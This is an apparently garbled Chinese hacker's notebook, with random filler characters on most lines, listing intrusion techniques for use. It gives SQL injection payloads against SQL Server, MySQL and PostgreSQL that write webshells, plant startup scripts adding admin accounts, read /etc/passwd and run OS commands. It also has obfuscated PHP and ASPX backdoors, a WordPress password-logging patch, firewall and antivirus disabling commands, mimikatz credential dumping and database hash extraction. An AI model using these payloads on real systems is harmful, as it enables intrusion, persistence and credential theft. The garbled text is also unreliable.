4 H* ?1 S0 G0 i# SC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml" n9 Z. D% o, S) {: {
+ {: w6 a9 K! a7 K8 `1 Y
如果都找不到 那就看看class文件吧。。) l+ { |+ S# L. N6 u1 M
4 N8 Z, U$ e% L5 j* h: A, Y4 p
测试1: 1 b# v0 q3 I+ j. z L* U- LSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 $ A6 M1 A0 t/ \! m) D8 }* C. M8 B. E. C3 P7 N3 ~% }
测试2:1 H* J: w8 e; [0 D% q7 z
' D+ {9 z; ^) Z3 }- _; Screate table dirs(paths varchar(100),paths1 varchar(100), id int)# F! R( s* K* p6 _8 |( J
: L l* @* R* ~' E9 D w: Z8 _, Y
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) |( a' W- E4 [
% Z2 p' N' z3 k9 e' fSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1 9 p3 X, w* J% Z9 {- Z* `. O8 t. v d( Y6 J
查看虚拟机中的共享文件: ( a/ h5 L0 T$ b6 G4 S9 h4 J4 U在虚拟机中的cmd中执行 , }$ r3 B% a+ p) q$ k3 U- q\\.host\Shared Folders & m8 t4 e) s0 A5 Y/ O. @ - A3 [/ o$ }$ W2 B# l8 Ycmdshell下找终端的技巧 % ]2 K5 j" [) t7 X5 Y找终端: 1 P* w: p+ y) G. I3 O第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! ! V3 V1 ]- ^( q; { 而终端所对应的服务名为:TermService 7 G7 o% N- i8 a; d$ r1 P
第二步:用netstat -ano命令,列出所有端口对应的PID值! 6 V: @ m% N4 }' J" X$ L' e7 t 找到PID值所对应的端口* w! L8 u1 m/ V) C
- u& A1 ]. H$ r( J, w" m查询sql server 2005中的密码hash. j7 W' h! A" \* }$ J& g( i. D
SELECT password_hash FROM sys.sql_logins where name='sa'" Q' N" w+ x) S# c
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a / A0 s8 K7 G- U: {0 jaccess中导出shell u) N( P- }* h , z9 J, a! Z. }: K% Y中文版本操作系统中针对mysql添加用户完整代码:# h1 ^' v0 o9 @
0 R$ a3 d8 N* ?use test; _* h: A( _- G$ ^) x7 x: N& {$ b( rcreate table a (cmd text); & g6 `" `* i) r' Xinsert into a values ("set wshshell=createobject (""wscript.shell"") " ); z7 q( e( H* ^' H G5 s3 `insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " ); 8 Q% y, T/ F- b. `insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );6 {" }4 N2 q" h3 r- F
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";5 Q j# _ Y: `: U6 b& e
drop table a; $ T4 Y q1 s: t+ _! ~! `- J% K 6 z/ f( v; v5 p7 F4 b7 b7 b ^英文版本:) h: G" y; F( `2 _" \/ T
0 g4 P& e u( k7 n
use test;) `: b9 i& }1 u% C+ r1 H
create table a (cmd text); 3 j* K) o! r" d, A; n) {: ?6 }insert into a values ("set wshshell=createobject (""wscript.shell"") " ); & ^' C* ?/ f& P& Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );1 x0 y* O2 @# Y/ P V/ h) C$ e
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 I* ]# a$ p) K4 M" S- O; r
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";2 p/ Q+ i* i4 ?4 Q9 \5 @; p, r
drop table a;* V9 K# Q( k" P4 d" C
4 t" F6 m. P* U' ~" dcreate table a (cmd BLOB);+ Z; t9 e6 p' M* f
insert into a values (CONVERT(木马的16进制代码,CHAR));' S7 G: f8 |" t, A4 Y$ U
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'6 e) V! j. G8 }9 A
drop table a;9 f* Y. n' @& f9 [& C( i- \
" I. ?& H: k- K/ G6 f) N, m6 ?
记录一下怎么处理变态诺顿. \/ [, z) [: C0 }3 A# x3 u
查看诺顿服务的路径 . S/ \! @9 e# n. C6 k! Tsc qc ccSetMgr * J- d8 r' q O* a* |然后设置权限拒绝访问。做绝一点。。 0 C3 A6 {, U4 q1 Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system 1 r5 ~; m8 U" W( d3 E, J& [* mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER" - v$ l8 k5 x! [/ C: @" gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators& `# k- r0 _" n' a/ O: F. T0 Y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone 8 p: R5 E2 G* b7 g! s: j' x9 p8 t: R; k
然后再重启服务器 : q2 p$ i, j: @$ Qiisreset /reboot 0 U& f e, l! v$ @6 }这样就搞定了。。不过完事后。记得恢复权限。。。。. b% ~+ \- t' V. E4 m1 A
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F - @) \( t5 o, j* \$ N! g7 S; N# Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F/ ]3 d" C5 r; e1 t* e' k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F ( M. R+ f( C8 V6 A% Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F- w# [! {# ^2 X* Q5 L9 ^/ L
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin1 o! M7 B0 v! c6 P
; W6 B, Z3 ]# _, J& X7 d; e' e
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') y. b$ G/ v2 S! h( x; q/ v% {3 s h7 a7 r9 Y/ x0 M- ^9 b& t4 I
postgresql注射的一些东西 + V1 Y4 N+ t2 V1 F; `( E如何获得webshell5 e( v( b8 w1 a. H8 q' x$ r http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); - A/ k. j7 Q t+ H, I$ U http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); : O7 y& l* B* L, F http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;8 Q8 ^' @6 P) c7 u. x0 N
如何读文件 : I" K/ I6 Q+ [2 J( p6 v# u# Z- z! T7 {) ]http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT); 7 r/ s3 D3 u- Y- _http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’; - F! Y- |- F. S( c ^http://127.0.0.1/postgresql.php?id=1;select * from myfile;' S% [4 F) t5 H, }" N
& R! g: p& a0 mz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。! k a+ L( D; t
当然,这些的postgresql的数据库版本必须大于8.X( q' L) S+ p+ M2 H
创建一个system的函数:8 T: E- Q2 J3 u- l2 i
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT) U$ `7 k5 U) o- v2 ?4 I0 }
; e9 ]/ w) @! V4 P. J$ D, pcopy 输出的内容到表里面; , K: D* m0 k7 N1 ?COPY stdout(system_out) FROM '/tmp/test'# E3 ~4 s: s3 R, Y* P
- L' G% I. [. F7 g从输出表内读取执行后的回显,判断是否执行成功' c+ `5 Y# @* h3 M
+ p# Q! U9 t6 L3 W& J3 Y
SELECT system_out FROM stdout 8 n/ p. _% [ P- e% L- ^5 \下面是测试例子 : X8 d- V3 m, q. _ 0 ~# H$ j5 q. u ^+ u) w/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 4 R: B. }& w2 k; H( Z0 X3 I4 \( |5 R- `5 ~
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'' |' f- I! }: J# ?- N# T
STRICT --: ^ U# b& D+ g8 y3 D. s
: X- @1 w, X! d/store.php?id=1; SELECT system('uname -a > /tmp/test') -- # D' [; J3 ~! R) a! |% ~ # w& C9 v, j5 l j/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --& w }9 ~% V5 {: o7 b
. s# u& D5 B. e
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1-- ; u$ d: s6 I8 A3 Lnet stop sharedaccess stop the default firewall; I2 \4 `' U2 R0 a% W( s
netsh firewall show show/config default firewall , K# D' D3 j$ ?5 [4 y% K+ unetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall * N3 v _ a- E4 T( anetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall f' V8 }" j- o p* t3 a修改3389端口方法(修改后不易被扫出) & L: o2 A6 e- h% S) ~" I; [修改服务器端的端口设置,注册表有2个地方需要修改. O" O: B. }: D8 \0 T( E9 M
# C- s) Y8 J/ J7 |$ y9 n
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp] * \+ h$ G0 c2 Y$ r9 dPortNumber值,默认是3389,修改成所希望的端口,比如6000 ; A: y* \6 D3 ~" `6 h' q* I- x% ^, E/ H- Z
第二个地方:( y, b" z8 P0 ^4 c
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 2 Q' n( V( N3 }7 i3 \5 H- OPortNumber值,默认是3389,修改成所希望的端口,比如6000( |. t4 w F e9 _3 F4 E
) J0 p/ J; ]9 K. W4 x/ J现在这样就可以了。重启系统就可以了 0 ?: B4 S& Z- ?# B; y! p x& G
查看3389远程登录的脚本 0 \2 l- w6 t( c) F8 M; G保存为一个bat文件 9 {& b8 O9 j" S0 x3 \date /t >>D:\sec\TSlog\ts.log 2 Z. w& V0 _% M7 a* A: v# D, w; ztime /t >>D:\sec\TSlog\ts.log4 b- c# C" q ^+ z- M
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log# ~) `( u' y; h3 }0 l
start Explorer/ L% U! q6 ]/ ^. j* { k8 C7 R
8 _) C. H! o- o9 T tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)' v P+ w: x5 A0 z/ ^& S8 R
% c& [0 b5 I5 z2 I SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找): e5 d% M3 W b. U& @7 `0 O P
set names gb2312) r1 t. v. M% J( a- I
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。$ E0 V9 `$ d! {, G3 w$ _; U
4 I# C9 Y: C3 f Dmysql 密码修改 / v" [& ], B6 ^' {5 z1 J4 B8 P0 `1 pUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” & e- ^& u" ^* O; {- `* U
update user set password=PASSWORD('antian365.com') where user='root';4 Z' f1 }: ?$ b. e5 H! H& M7 N
flush privileges; 3 `- B4 k; H% t" F3 p* V高级的PHP一句话木马后门) g4 W9 G0 x: o. F' \
$ a9 {8 F5 k+ E3 q+ [
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀' X# @4 J$ B2 Y9 U/ H( N3 k! ]5 g2 D
- H3 e' G( M' p+ o, R1、/ O! m5 L' j5 ~4 A- t4 o
6 s/ b; S9 m' Z0 Z. J+ N
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$ ? ~& i1 Z) X$ Y
; G, P$ I* f2 ~' `" D
$hh("/[discuz]/e",$_POST['h'],"Access"); + l6 k8 R$ h/ G$ c2 I$ j' c9 R$ _ 4 a' R$ Q1 d$ d) v3 ~5 u) W; V/ l//菜刀一句话 - t: }8 g" |% u" g$ z8 v' P ; m) N2 C/ h( m9 q) q4 i2、 , U/ K5 k. C5 w0 {$ T+ K, }) @! r ' j) A9 Q, l1 d+ _; t V3 g6 X$filename=$_GET['xbid']; : M1 w2 k: y! `7 J: N6 x3 k 3 z" |7 F* o* e# [9 Tinclude ($filename);7 `; J# p' B1 A6 F: o% w7 @
) Y: ^1 _& v/ I: X1 D8 \
//危险的include函数,直接编译任何文件为php格式运行% Y, Y1 L7 g$ s9 s, D" d
* R. s2 x D& B+ o! ]3、# l( R+ n2 _# ?- M
7 z' c2 o5 Q! \" m' P
$reg="c"."o"."p"."y";+ F+ q: t, b' R2 ?$ l
* J, {- ]& _( I1 X4 G6 y; G, O, f
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);# m8 N+ t% P4 h$ K5 [; R* i+ N
& R. M4 c4 V+ N//重命名任何文件 # X) r" G( e% ~7 o& o- @! ~0 U7 {- q& ? j0 y+ R
4、1 G F3 d' v W4 u
4 f3 Z! B4 R+ r, h. q9 t' U$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; 7 p8 T: c2 B0 u/ Z, L0 z# I F( ]/ ^' |3 Y& v" m$ {0 s# Z5 O
$gzid("/[discuz]/e",$_POST['h'],"Access");0 W& n9 A7 _! f
. L7 y% H+ B% r* z4 `) t/ S! G
//菜刀一句话 2 g1 j1 q8 f t. \; q/ n1 [8 y, Q' Z7 d; U* x
5、include ($uid);# I8 P- w9 Q: Y+ t
, e7 l6 V" M' C8 d& e% ~" `; E
//危险的include函数,直接编译任何文件为php格式运行,POST # q/ m+ Q2 a; ~5 w- s
/ e& m9 |* a7 {5 u U' S V 9 E. k+ y' J o: s$ X//gif插一句话 # t4 O, \3 w+ a0 D0 A7 m ; D7 N1 L" q; g& V- H8 ^- l6、典型一句话6 P: q6 f" f; Q' m! K
$ F/ K" h( u/ V- y' b6 D
程序后门代码 : B! ?# h; T6 j" }$ n<?php eval_r($_POST[sb])?> 8 [/ B# Z) A( a+ C2 E程序代码3 M+ _) ^7 S7 ~) k; t
<?php @eval_r($_POST[sb])?> w! }; U H) {' e, P ]//容错代码6 S6 K3 V$ C7 N1 q
程序代码 * E9 Y+ e, x, p/ N) d<?php assert($_POST[sb]);?> D% t9 j4 {. d+ Q//使用lanker一句话客户端的专家模式执行相关的php语句# H6 ]) a, F& M" B( e
程序代码! Q. p- ^0 U! k0 |3 F7 z- M# s3 [
<?$_POST['sa']($_POST['sb']);?>$ j8 g+ c. F$ D6 n
程序代码+ H8 ?" t5 |: d6 O4 c
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?> ! }+ c1 d7 r0 d. e- @程序代码9 B$ z/ | p$ o
<?php + r# |" n# C( p1 F+ p( V" v: \@preg_replace("/[email]/e",$_POST['h'],"error"); " u" _% @( Q. S2 w* _?>. `0 y3 U# k! C6 T3 K
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入2 M/ S9 n" F' M5 c. a) _# \
程序代码5 f8 E T! N9 B9 c9 _7 U0 e
<O>h=@eval_r($_POST[c]);</O>2 X, y$ e% `$ W0 r) C. \2 d; }
程序代码, n3 z# Z& P& } ^
<script language="php">@eval_r($_POST[sb])</script> 0 l# [/ z0 `, S# K: j//绕过<?限制的一句话 % p8 J# @; |4 h' Q4 v* d* h+ C# `5 E {8 y K) }, f http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip$ e" N. a5 V: y: c5 z
详细用法:! p* p7 @: f K" f$ j
1、到tools目录。psexec \\127.0.0.1 cmd 5 U9 S* ~) X& P1 _3 y. ^8 N- M! T2、执行mimikatz3 e; g: t/ X1 s( t3 |, f
3、执行 privilege::debug 5 S7 s; U2 m% G. Z4、执行 inject::process lsass.exe sekurlsa.dll / H9 t! H# b) `: S5 g- K @0 s$ z6 [2 C0 e5、执行@getLogonPasswords , Z! t" g2 ~, q2 Q6、widget就是密码 / D& P* o# S0 A( C3 j n1 m7、exit退出,不要直接关闭否则系统会崩溃。 + }4 x. V: B& ^+ q4 E9 K0 M) J% b- k' O! g$ } http://www.monyer.com/demo/monyerjs/ js解码网站比较全面 : s( d" ? Q% b- e" [" L+ T ! L: t0 g( l+ l4 o# w自动查找系统高危补丁" i* w3 O" K% e- G: ]
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt& w# Y+ d; T# A4 T
5 ]* C: b9 \8 k; F3 ?
突破安全狗的一句话aspx后门7 d& S4 b0 E1 @( F! H" [7 F
<%@ Page Language="C#" ValidateRequest="false" %>2 ^' I4 I* w' D
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> 2 H# K1 h2 d, e% H2 uwebshell下记录WordPress登陆密码 7 J' Y- ~) m" r4 cwebshell下记录Wordpress登陆密码方便进一步社工0 w, D# S4 k4 E: n) V9 q! I
在文件wp-login.php中539行处添加: 0 C" a6 \- K; }// log password Q' I, d/ M5 W$log_user=$_POST['log']; & [$ {, C, F- i& g3 i0 A$log_pwd=$_POST['pwd']; - ^, g; n2 S: G! e3 m5 |$log_ip=$_SERVER["REMOTE_ADDR"];: B* H7 Z, J1 A/ U5 h) a$ R
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; ; }- ~( E* i' g! @# g$txt=$txt.”\r\n”; - p( y& O5 v" N! Xif($log_user&&$log_pwd&&$log_ip){ # [5 y5 n6 _& V- N- R3 [@fwrite(fopen(‘pwd.txt’,”a+”),$txt);: ]3 L- I% n5 k9 J4 @. {
}! A5 [# U# {: p6 Y5 g
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。 1 C+ o5 T7 Q6 Y7 a# T. d; u. {就是搜索case ‘login’4 c' \! b+ ]2 p( {1 o1 o1 s
在它下面直接插入即可,记录的密码生成在pwd.txt中,8 V6 Y; S+ k' q0 R
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录 - l2 E/ G1 m `% S利用II6文件解析漏洞绕过安全狗代码:- s g- {1 a4 x# K" ^& Z1 L
;antian365.asp;antian365.jpg ( ~6 P9 l, R2 k. B4 _( I! W( x3 ~) r- P: S8 S3 r% l1 Y
各种类型数据库抓HASH破解最高权限密码!# R: k h* @+ f! \, {- a$ ?) Y
1.sql server2000% j% e- a' G9 P' E7 a q. \
SELECT password from master.dbo.sysxlogins where name='sa' . l6 ?7 T- o+ h; y: C2 ^! j* j0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341, w0 z3 Q& O; |- y' T
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A . u% z9 N' g3 [/ P3 T& p% k J) X4 y3 k9 M9 @9 ^. |5 C; e
0×0100- constant header2 {+ {" m5 X- h1 n
34767D5C- salt ( {5 ~& `, ^) U* l; X+ ?) \0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash * v5 G) y1 W) w( y+ Z$ b. M2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash 2 }1 K [5 E# O# T# Jcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash4 c" n* z2 s- z& Q2 a4 }
SQL server 2005:- 7 r3 A& J/ i1 ]" h ESELECT password_hash FROM sys.sql_logins where name='sa' 8 r" I, H% R4 j) ? z0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F T0 N, q2 S$ c u0×0100- constant header$ t0 x+ E _! ]5 S# f! w/ ^
993BF231-salt 5 ?1 P- L1 S" k8 {# z" ~% S' K* R5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash $ f" q; {3 e' I: L" j! S% tcrack case sensitive hash in cain, try brute force and dictionary based attacks.' }' k. b2 V3 w( k2 W, i1 V
4 a+ }7 _9 S2 s5 q; ], e
update:- following bernardo’s comments:-: c4 [+ x" f, P( _* S! l
use function fn_varbintohexstr() to cast password in a hex string.2 X0 J7 [& D8 u. {# i: h; \. z1 y
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins F2 h4 v8 }1 `! H; C
* V/ d" Z: L1 @MYSQL:-1 s: {2 ~* u1 V# H5 L! \
/ R7 F" k2 Q0 O+ ?/ w
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2. " ^* R3 p! I) x+ U: P( ~- W, O" [/ m2 w* j1 e+ u* e! d0 w% k0 J# m9 B
*mysql < 4.15 Z% ?0 h. V, Y. C5 _